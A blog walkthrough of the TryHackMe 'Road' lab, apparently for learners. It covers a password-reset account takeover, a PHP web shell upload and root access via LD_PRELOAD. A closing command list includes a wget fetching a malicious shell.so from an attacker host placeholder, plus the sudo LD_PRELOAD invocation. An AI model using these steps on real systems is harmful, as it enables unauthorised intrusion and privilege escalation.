We covered web application authentication bypass using the reset feature in addition to Linux privilege escalation using the LD_PRELOAD method. This was part of TryHackMe Road.

By taking advantage of lack of check on the username field, we reset the password and intercept the request with Burp Suite. By changing the username to admin, we were able to reset the admin password and get access to the administration dashboard. We uploaded a web shell and got the first foothold on the machine. Privilege escalation was accomplished by creating a shared object file and make a binary use it to run as sudo. More on Linux privilege escalation notes

Finding a Way In

My journey starts with a standard Nmap scan, which shows me an SSH port and an HTTP port are open. I check out the web server and find a “Merchant Central” login page. Instead of just hammering away at it, I decide to register a new user to see how the authentication works from the inside.

After logging in, I find a profile image upload feature, but it’s restricted—only the admin can upload files. This is my first big clue. The key to getting admin access turns out to be a flaw in the password reset function. I use Burp Suite to intercept the password reset request for my own user, and then I simply change the username in the request to admin@sky.thm. Just like that, I’m able to reset the admin’s password and log in as the administrator.

With admin privileges, I can now upload files. I upload a simple PHP web shell and find the upload path by looking at the page’s source code. Navigating to my uploaded shell gives me my first foothold on the machine.

From User to Root

Once I have a shell, I stabilize it and start looking around. I find the user flag in the webdeveloper‘s home directory. Now, it’s time to escalate my privileges to root.

I notice that a MongoDB database is running on the machine. Databases are often a treasure trove of credentials, and this one doesn’t disappoint. I log into the database, find a backup database, and dump the contents of the user collection. Inside, I find the plaintext password for the webdeveloper user.

I use the password to switch to the webdeveloper user account. From there, I check what commands I can run with sudo. I find that I can run a sky_backup_utility as any user, including root, and most importantly, the LD_PRELOAD environment variable is preserved.

This is a classic privilege escalation vector. I write a small piece of C code that spawns a shell, compile it into a shared object (.so) file, and upload it to the target machine. Then, I run the backup utility with sudo, but I use the LD_PRELOAD variable to load my malicious shared object first. This trick works perfectly, and I’m rewarded with a root shell. đź‘‘

Finally, I navigate to the /root directory and grab the final flag.

Technical Commands

Here are some of the key commands I used to own this box:

  • Initial Recon:
    • nmap
  • Database Enumeration:
    • netstat -tulnp
    • mongo
    • show dbs
    • use backup
    • show collections
    • db.user.find()
  • Privilege Escalation:
    • su webdeveloper
    • sudo -l
    • nano shell.c
    • gcc -shared -o shell.so shell.c
    • wget http://[YOUR_IP]/shell.so
    • sudo LD_PRELOAD=/home/webdeveloper/shell.so /usr/bin/sky_backup_utility
  • Basic Navigation and File Operations:
    • ls, cat, cd, pwd, id
    • python3 -m http.server 80

TryHackMe Road Challenge Answers

What is the user.txt flag?

What is the root.txt flag?

Video WalkThrough

 

, ,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles